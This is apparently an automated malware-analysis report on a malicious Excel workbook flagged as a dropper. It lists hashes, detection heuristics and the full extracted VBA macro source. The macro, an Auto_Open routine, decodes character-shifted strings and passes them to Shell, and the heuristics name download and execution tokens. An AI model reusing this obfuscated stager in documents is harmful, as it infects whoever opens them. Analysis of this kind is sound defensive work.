Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2ab28c438d647d8e…

MALICIOUS

Office (OLE)

74.5 KB Created: 2006-09-16 00:00:00 Authoring application: Microsoft Excel First seen: 2021-02-09
MD5: a8a8d792f404ecf97d0df751f6832bcf SHA-1: 499d16977ace09d8158285304259db920e72d1fa SHA-256: 2ab28c438d647d8e62e78f4307095874d62d28aeb073e5823aee2bbf38d038f2
256 Risk Score

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-7011426-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-7011426-0
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell (rs0 + rs3 + rs1 + rs2)
  • VBA character-shift decoded Shell command critical OLE_VBA_ASC_CHR_SHIFT_SHELL
    VBA auto-exec macro stores an encoded command string, decodes it with a Mid/Asc/Chr character-shift loop, and passes the recovered text to Shell. This is a high-confidence command stager.
    Matched line in script
    For aiWDAOpxi = 1 To Len(V4JVdoDM6)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3162 bytes
SHA-256: f21bd4c8b70e8ac5cf74263d704cd0a3e7113138850fed3c7670bf18930fe13a
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub Auto_Open()
rs0 = Replace(QzeBBKA8y(SMfVNQqv2("~„a…r1a", SMfVNQqv2("<", "4")), SMfVNQqv2("@", SMfVNQqv2("?", SMfVNQqv2("<", "4")))), QzeBBKA8y(SMfVNQqv2("S", "2"), SMfVNQqv2(SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6")), SMfVNQqv2(":", "6"))), QzeBBKA8y(SMfVNQqv2("m", SMfVNQqv2(":", "6")), SMfVNQqv2(SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6")), SMfVNQqv2(":", "6"))))
rs2 = Replace(QzeBBKA8y(SMfVNQqv2("Wo~}~l[VPƒxp^OP", "6"), SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6"))), QzeBBKA8y(SMfVNQqv2("S", "2"), SMfVNQqv2(SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6")), SMfVNQqv2(":", "6"))), QzeBBKA8y(SMfVNQqv2("Nsg", "2"), SMfVNQqv2(":", "6")))
rs1 = Replace(QzeBBKA8y(SMfVNQqv2("pw[q}{=", "9"), SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6"))), QzeBBKA8y(SMfVNQqv2("T", "2"), SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6"))), QzeBBKA8y(SMfVNQqv2("�y†;", "6"), SMfVNQqv2("?", SMfVNQqv2("<", "4"))))
rs3 = Replace(QzeBBKA8y(SMfVNQqv2("||xB77KKK6", SMfVNQqv2(";", "8")), SMfVNQqv2("6", SMfVNQqv2(SMfVNQqv2("?", SMfVNQqv2("<", "4")), "6"))), QzeBBKA8y(SMfVNQqv2("M", "2"), SMfVNQqv2("<", "4")), QzeBBKA8y(SMfVNQqv2(" ", "5"), SMfVNQqv2(";", "8")))
Shell (rs0 + rs3 + rs1 + rs2)
End Sub
Public Function QzeBBKA8y(V4JVdoDM6 As String, pqcIpxLC9 As Integer)
Dim aiWDAOpxi As Integer
For aiWDAOpxi = 1 To Len(V4JVdoDM6)
Mid(V4JVdoDM6, aiWDAOpxi, 1) = Chr(Asc(Mid(V4JVdoDM6, aiWDAOpxi, 1)) - pqcIpxLC9)
Next aiWDAOpxi
QzeBBKA8y = V4JVdoDM6
End Function
Public Function SMfVNQqv2(zRc9PYTbD As String, LoEyylR6D As Integer)
    Dim FKtD6Y0KV As Integer
    For FKtD6Y0KV = 1 To Len(zRc9PYTbD)
        Mid(zRc9PYTbD, FKtD6Y0KV, 1) = Chr(Asc(Mid(zRc9PYTbD, FKtD6Y0KV, 1)) - LoEyylR6D)
    Next FKtD6Y0KV
    SMfVNQqv2 = zRc9PYTbD
End Function

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()

End Sub

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True